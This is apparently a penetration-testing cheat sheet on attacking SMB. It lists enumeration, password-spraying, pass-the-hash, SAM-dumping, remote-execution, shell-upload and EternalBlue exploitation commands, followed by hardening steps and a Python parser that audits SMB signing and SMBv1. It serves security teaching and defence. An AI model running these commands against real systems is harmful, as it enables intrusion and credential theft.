🧠 Description

Server Message Block (SMB) is a network protocol for file sharing, printer sharing, and remote administration. Attacks against SMB target its authentication mechanisms (password spraying, pass-the-hash, NTLM relay), its file operations, and its use as a channel for lateral movement through SMB-based tools.

Common SMB Vulnerabilities:
  • EternalBlue (CVE-2017-0144): RCE via SMBv1
  • SMBGhost: SMBv3 compression bug
  • SMB signing disabled: NTLM relay vulnerability
  • Null sessions: Anonymous enumeration

🔍 SMB Enumeration

# Null session enumeration
enum4linux -a target.com
smbclient -L //target.com -N

# With credentials
smbclient //target.com/share -U user%password
enum4linux -a -u user -p password target.com

# List shares
smbmap -H target.com
smbmap -H target.com -u guest

# Check SMB signing
nmap --script smb-security-mode.nse -p 445 target.com

💣 Exploitation

CrackMapExec:

# Password spray
crackmapexec smb 10.10.10.0/24 -u admin -p Password123

# Pass the hash
crackmapexec smb 10.10.10.100 -u administrator -H ntlmhash --local-auth

# Execute command
crackmapexec smb 10.10.10.100 -u admin -p pass -x "whoami"

# Dump SAM
crackmapexec smb 10.10.10.100 -u admin -p pass --local-auth -M sam

Impacket Tools:

# PSEXEC-style access
python3 psexec.py domain/user:password@target.com

# WMI exec
python3 wmiexec.py domain/user:password@target.com

# SMB exec
python3 smbexec.py domain/user:password@target.com

# Kerberos auth
python3 psexec.py -k domain/user@target.com

SMB File Operations:

# Connect to share (the get/put commands below run at the smb: \> prompt)
smbclient //target.com/C$ -U admin%password

# Download file (remote name first, then local destination)
smb: \> get file.txt /tmp/file.txt

# Upload file (remote path is relative to the share root, not a UNC path)
smb: \> put shell.exe Windows\Temp\shell.exe

# List with rpcclient
rpcclient target.com -U admin%password
> enumdomusers
> netshareenum

⚡ EternalBlue Exploitation

# Check if vulnerable
nmap --script smb-vuln-ms17-010.nse -p 445 target.com

# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/bind_tcp
run

# Manual exploit
git clone https://github.com/worawit/MS17-010
python2 send_and_exploit.py target.com

🛡️ Mitigation

✅ Secure SMB Configuration:
  • Disable SMBv1: Removes the attack surface used by EternalBlue
  • Enable SMB signing: Prevents NTLM relay attacks
  • Block port 445: From untrusted networks and the Internet
  • Use Firewall: Limit SMB access to authorized hosts only
  • Strong passwords: Prevent password spraying and other credential attacks

# Require SMB signing on the server
Set-SmbServerConfiguration -RequireSecuritySignature $true

# Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

# Enable signing via GPO (set both the client and the server policy)
# Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
# Microsoft network client: Digitally sign communications (always)
# Microsoft network server: Digitally sign communications (always)
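The "Check SMB signing" nmap script above and the first two mitigation items (no SMBv1, signing required) both come down to two fields in the server's NEGOTIATE reply. The following is an added example, not code from the original page: it parses a captured NEGOTIATE response (SMB2 SecurityMode bits and dialect, or the SMB1 SecurityMode byte) and reports policy findings. The helper that builds the sample reply and the NegotiateAudit name are constructed for this example.

```python
import struct
from dataclasses import dataclass

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SIGNING_ENABLED, SIGNING_REQUIRED = 0x01, 0x02          # SMB2 SecurityMode bits
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}

@dataclass
class NegotiateAudit:
    dialect: str
    signing_enabled: bool
    signing_required: bool

    def findings(self) -> list:
        """Policy checks matching the mitigation list: no SMBv1, signing required."""
        out = []
        if self.dialect.startswith("SMB1"):
            out.append("SMBv1 dialect accepted")
        if not self.signing_required:
            out.append("signing not required (relay-prone)")
        return out

def parse_negotiate_response(data: bytes) -> NegotiateAudit:
    """Parse a server NEGOTIATE reply (4-byte NetBIOS session header already stripped)."""
    magic = data[:4]
    if magic == SMB1_MAGIC:
        # SMB1: 32-byte header, WordCount at 32, DialectIndex at 33, SecurityMode byte at 35
        sec = data[35]
        return NegotiateAudit("SMB1 (NT LM 0.12)", bool(sec & 0x04), bool(sec & 0x08))
    if magic != SMB2_MAGIC or struct.unpack_from("<H", data, 12)[0] != 0:
        raise ValueError("not an SMB2 NEGOTIATE response")
    size, sec_mode, dialect = struct.unpack_from("<HHH", data, 64)   # body follows 64-byte header
    if size != 65:
        raise ValueError("malformed NEGOTIATE body")
    return NegotiateAudit(DIALECTS.get(dialect, f"unknown 0x{dialect:04x}"),
                          bool(sec_mode & SIGNING_ENABLED), bool(sec_mode & SIGNING_REQUIRED))

def build_sample_smb2_response(security_mode: int, dialect: int) -> bytes:
    """Constructed sample reply for offline testing: SMB2 header + fixed-size NEGOTIATE body."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, 0, 1, 0x1, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\0" * 16,
                       0, 0x100000, 0x100000, 0x100000, 0, 0, 128, 0, 0)
    return header + body

if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        audit = parse_negotiate_response(build_sample_smb2_response(mode, 0x0311))
        print(audit.dialect, "findings:", audit.findings() or "none")
```

A server whose reply only has SIGNING_ENABLED set still negotiates unsigned sessions with clients that do not require signing, which is the condition the relay-attack mitigation targets.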